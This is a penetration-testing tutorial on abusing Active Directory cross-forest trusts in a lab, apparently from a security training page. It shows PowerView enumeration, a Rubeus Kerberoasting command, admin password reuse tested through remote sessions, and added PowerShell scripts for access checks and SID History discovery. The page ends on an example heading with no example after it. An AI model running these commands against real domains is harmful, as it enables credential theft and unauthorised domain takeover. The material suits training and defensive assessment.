Cross-Forest Trust Abuse From Windows

Cross-Forest Kerberoasting

Kerberos attacks such as Kerberoasting can be performed across trusts, depending on the trust direction. If the trust is inbound or bidirectional from our position (the target domain trusts the domain we already control), we can request service tickets for accounts in the target domain and may be able to use them to gain a foothold there.

Sometimes we cannot escalate privileges in the current domain but can obtain a service ticket for, and crack the password of, an administrative account in another domain that holds Domain Admin or Enterprise Admin rights in both domains.

Enumerating Accounts for Associated SPNs with PowerView

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName 

samaccountname
--------------
krbtgt
mssqlsvc

Enumerating a Specific Account with PowerView

If we find an account with an SPN, we check whether it is a member of the Domain Admins group. If it is, we can Kerberoast it and crack the TGS-REP hash offline; the recovered password gives full administrative rights in the target domain.

Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof
-------------- --------
mssqlsvc       CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL

Perform a Kerberoasting Attack with Rubeus

We run Rubeus with the /domain flag so the LDAP lookup and TGS request are directed at the trusted domain rather than our own; /nowrap prints the hash on a single line so it can be pasted straight into hashcat (mode 13100 for the RC4 TGS-REP hash Rubeus requests by default). Kerberoasting only ever yields a hash to crack offline, so success still depends on the service account having a weak password.

.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Admin Password Re-Use & Group Membership

When there is a bidirectional forest trust, we should check whether taking over Domain A lets us obtain cleartext passwords or NT hashes for the built-in Administrator account or for members of the Enterprise Admins group. Domain B may have highly privileged accounts with the same names, so we should also check for password reuse across both forests.

We might also see users from Domain A as members of a group in Domain B. Only domain local groups can contain security principals from outside their own forest, so those are the groups to enumerate.

Using Get-DomainForeignGroupMember

This cmdlet enumerates groups in the specified domain that contain members from outside it (foreign security principals). PowerView reports such a member by its SID, which ConvertFrom-SID resolves to an account name; here the built-in Administrators group of FREIGHTLOGISTICS.LOCAL turns out to contain the INLANEFREIGHT administrator account.

Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

Accessing DC Using Enter-PSSession

We can verify this access with Enter-PSSession. Below, we authenticate to the FREIGHTLOGISTICS DC with the INLANEFREIGHT Administrator account and the password recovered in our own domain; whoami confirms the remote session runs as that foreign account.

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
   Primary Dns Suffix  . . . . . . . : FREIGHTLOGISTICS.LOCAL
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL
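The foreign-membership and password-reuse checks from the previous sections, followed by the access test, as one script. This is an added example, not code from the original page or from the PowerView project. It assumes PowerView is imported, uses the domain and DC names from this page, and prompts for the INLANEFREIGHT administrator password that an earlier step is assumed to have recovered rather than hard-coding it.

```powershell
# Added example: foreign group members, same-named admins, and an access test.
# Assumes PowerView is imported; names are the lab names used on this page.
$OurDomain    = 'INLANEFREIGHT.LOCAL'
$TargetDomain = 'FREIGHTLOGISTICS.LOCAL'
$TargetDC     = 'ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL'

# 1. Groups in the target domain holding members from outside it. PowerView reports
#    a foreign member by its SID, so resolve it to DOMAIN\name where possible.
$foreign = Get-DomainForeignGroupMember -Domain $TargetDomain | ForEach-Object {
    $name = $_.MemberName
    if ($name -match '^S-1-5-') { $name = ConvertFrom-SID -ObjectSID $name }
    [pscustomobject]@{
        Group  = "$($_.GroupDomain)\$($_.GroupName)"
        Member = $name
    }
}
$foreign | Format-Table -AutoSize

# 2. Privileged accounts in the target domain whose samAccountName also exists in
#    our domain: candidates for password reuse across the forests.
$targetAdmins = Get-DomainGroupMember -Domain $TargetDomain -Identity 'Domain Admins' -Recurse |
    Select-Object -ExpandProperty MemberName
$ourUsers = Get-DomainUser -Domain $OurDomain -Properties samaccountname |
    Select-Object -ExpandProperty samaccountname
$shared = $targetAdmins | Where-Object { $ourUsers -contains $_ }
"Same-named privileged accounts in both forests: $($shared -join ', ')"

# 3. Try the credential we already own against the target DC over WinRM. The
#    password is prompted for, not stored; a failure is reported, not thrown.
$cred = Get-Credential -UserName 'INLANEFREIGHT\administrator' -Message 'Password recovered in our own forest'
try {
    $who = Invoke-Command -ComputerName $TargetDC -Credential $cred -ScriptBlock { whoami } -ErrorAction Stop
    "Access to $TargetDC confirmed, running as $who"
}
catch {
    "No access to $TargetDC with these credentials: $($_.Exception.Message)"
}
```

Invoke-Command is used instead of Enter-PSSession so the check is non-interactive and the result can be captured; if WinRM is blocked across the trust, the same credential can be tried against SMB or RDP instead.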

SID History Abuse β€” Cross Forest

SID History can be abused across a forest trust. When a user is migrated from one forest to another, the SID of the old account is kept in the sidHistory attribute of the new one. If SID filtering is not enforced on the trust, a SID from the other forest (whether left over from a migration or added deliberately, which requires domain admin rights in the domain holding the account) is placed in the user's access token when they authenticate across the trust, and the other forest honours the group membership it implies. SID filtering is enabled by default on forest trusts, so this abuse depends on an administrator having relaxed it (for example with netdom trust ... /enablesidhistory:Yes).
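A way to check for this condition from the attacking side: read the trust's attributes and list every user in either forest whose sidHistory carries a SID belonging to the other one. This is an added example, not code from the original page or from the PowerView project; it assumes PowerView is imported and uses the two lab domain names from this page.

```powershell
# Added example: SID History that crosses the forest trust, plus the trust flags
# that decide whether it is honoured. Assumes PowerView is imported.
$OurDomain    = 'INLANEFREIGHT.LOCAL'
$TargetDomain = 'FREIGHTLOGISTICS.LOCAL'

# 1. Trust attributes. QUARANTINED_DOMAIN = SID filtering enforced on an external
#    trust; FOREST_TRANSITIVE = forest trust, which filters out-of-forest SIDs by
#    default; TREAT_AS_EXTERNAL is set by "netdom trust ... /enablesidhistory:Yes"
#    and relaxes filtering so SID History from the trusted forest is accepted.
Get-DomainTrust -Domain $OurDomain |
    Where-Object { $_.TargetName -eq $TargetDomain } |
    Select-Object SourceName, TargetName, TrustDirection, TrustAttributes

# 2. Domain SIDs, so each history entry can be attributed to a forest.
$sidToDomain = @{}
foreach ($d in @($OurDomain, $TargetDomain)) { $sidToDomain[(Get-DomainSID -Domain $d)] = $d }

# 3. Users in either domain whose sidHistory carries a SID from the other forest.
#    PowerView normally returns sidHistory as SID strings; raw byte arrays are handled too.
$hits = foreach ($d in @($OurDomain, $TargetDomain)) {
    Get-DomainUser -Domain $d -LDAPFilter '(sidHistory=*)' -Properties samaccountname,sidhistory |
        ForEach-Object {
            $user = $_.samaccountname
            foreach ($raw in @($_.sidhistory)) {
                $sid = if ($raw -is [byte[]]) {
                    (New-Object System.Security.Principal.SecurityIdentifier($raw, 0)).Value
                } else { [string]$raw }
                $domainSid = $sid -replace '-\d+$', ''
                [pscustomobject]@{
                    User          = "$d\$user"
                    HistorySID    = $sid
                    HistoryDomain = $(if ($sidToDomain.ContainsKey($domainSid)) { $sidToDomain[$domainSid] } else { 'unknown' })
                    RID           = [int]($sid -replace '^.*-', '')
                }
            }
        } | Where-Object { $_.HistoryDomain -ne $d }
}
$hits | Sort-Object RID | Format-Table -AutoSize
# A history SID from the other forest with RID 512 (Domain Admins) or 519
# (Enterprise Admins) is the interesting case; whether the token keeps it is
# decided by the trust flags printed in step 1.
```

Step 1 is the one to read first: if the trust shows QUARANTINED_DOMAIN, or is a plain FOREST_TRANSITIVE trust without TREAT_AS_EXTERNAL, the entries found in step 3 will be stripped from the cross-trust ticket and the finding is a hygiene issue rather than a path to compromise.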

An Example

The example below shows a user jjones being migrated from the INLANEFREIGHT.LOCAL domain to the CORP.local domain in a different forest.

Last updated 10 months ago
